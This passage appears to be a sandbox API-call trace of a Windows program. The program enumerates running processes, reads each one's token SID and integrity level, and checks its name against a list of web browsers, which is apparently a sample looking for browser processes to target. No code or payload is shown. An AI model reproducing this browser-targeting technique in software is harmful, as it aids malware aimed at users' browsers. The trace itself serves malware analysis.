(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0245.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0245.236] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.237] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.237] GetLastError () returned 0x7a [0245.237] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.237] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.237] CloseHandle (hObject=0x340) returned 1 [0245.237] CloseHandle (hObject=0x548) returned 1 [0245.237] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.237] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.237] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.237] GetLastError () returned 0x7a [0245.237] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.237] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.237] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.237] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0245.237] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0245.237] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0245.237] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0245.237] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0245.237] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0245.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0245.237] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.237] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.237] GetLastError () returned 0x7a [0245.237] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.237] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.238] CloseHandle (hObject=0x340) returned 1 [0245.238] CloseHandle (hObject=0x548) returned 1 [0245.238] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.238] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.238] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.238] GetLastError () returned 0x7a [0245.238] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.238] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.238] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.238] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0245.238] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0245.238] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0245.238] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0245.238] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0245.238] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0245.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0245.238] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.238] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.238] GetLastError () returned 0x7a [0245.238] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.238] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.238] CloseHandle (hObject=0x340) returned 1 [0245.238] CloseHandle (hObject=0x548) returned 1 [0245.238] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.238] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.238] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.238] GetLastError () returned 0x7a [0245.239] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.239] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.239] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.239] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0245.239] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0245.239] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0245.239] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0245.239] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0245.239] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0245.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0245.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0245.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0245.239] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.239] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.239] GetLastError () returned 0x7a [0245.239] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.239] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.239] CloseHandle (hObject=0x340) returned 1 [0245.239] CloseHandle (hObject=0x548) returned 1 [0245.239] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.239] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.239] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.239] GetLastError () returned 0x7a [0245.239] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.239] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.239] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.240] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.240] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.240] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0245.240] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.240] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.240] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0245.240] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.240] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.240] GetLastError () returned 0x7a [0245.240] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.240] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.240] CloseHandle (hObject=0x340) returned 1 [0245.240] CloseHandle (hObject=0x548) returned 1 [0245.240] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.240] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.240] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.240] GetLastError () returned 0x7a [0245.240] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.240] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.240] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.240] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0245.240] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0245.240] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0245.240] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0245.240] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0245.240] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0245.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0245.240] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.241] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.241] GetLastError () returned 0x7a [0245.241] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.241] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.241] CloseHandle (hObject=0x340) returned 1 [0245.241] CloseHandle (hObject=0x548) returned 1 [0245.241] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.241] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.241] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.241] GetLastError () returned 0x7a [0245.241] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.241] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.241] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.241] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0245.241] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0245.241] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0245.241] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0245.241] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0245.241] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0245.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0245.241] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.241] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.241] GetLastError () returned 0x7a [0245.241] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.241] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.241] CloseHandle (hObject=0x340) returned 1 [0245.241] CloseHandle (hObject=0x548) returned 1 [0245.242] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.242] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.242] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.242] GetLastError () returned 0x7a [0245.242] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.242] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.242] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.242] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0245.242] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0245.242] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0245.242] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0245.242] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0245.242] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0245.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0245.242] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.242] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.242] GetLastError () returned 0x7a [0245.242] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.242] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.242] CloseHandle (hObject=0x340) returned 1 [0245.242] CloseHandle (hObject=0x548) returned 1 [0245.242] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.242] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.242] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.242] GetLastError () returned 0x7a [0245.242] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.243] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0245.243] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0245.243] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.243] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0245.243] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.243] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.243] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.243] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0245.243] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0245.243] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0245.243] GetLastError () returned 0x7a [0245.243] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0245.243] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0245.243] CloseHandle (hObject=0x340) returned 1 [0245.243] CloseHandle (hObject=0x548) returned 1 [0245.243] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.243] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0245.243] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0245.243] GetLastError () returned 0x7a [0245.243] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0245.243] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, 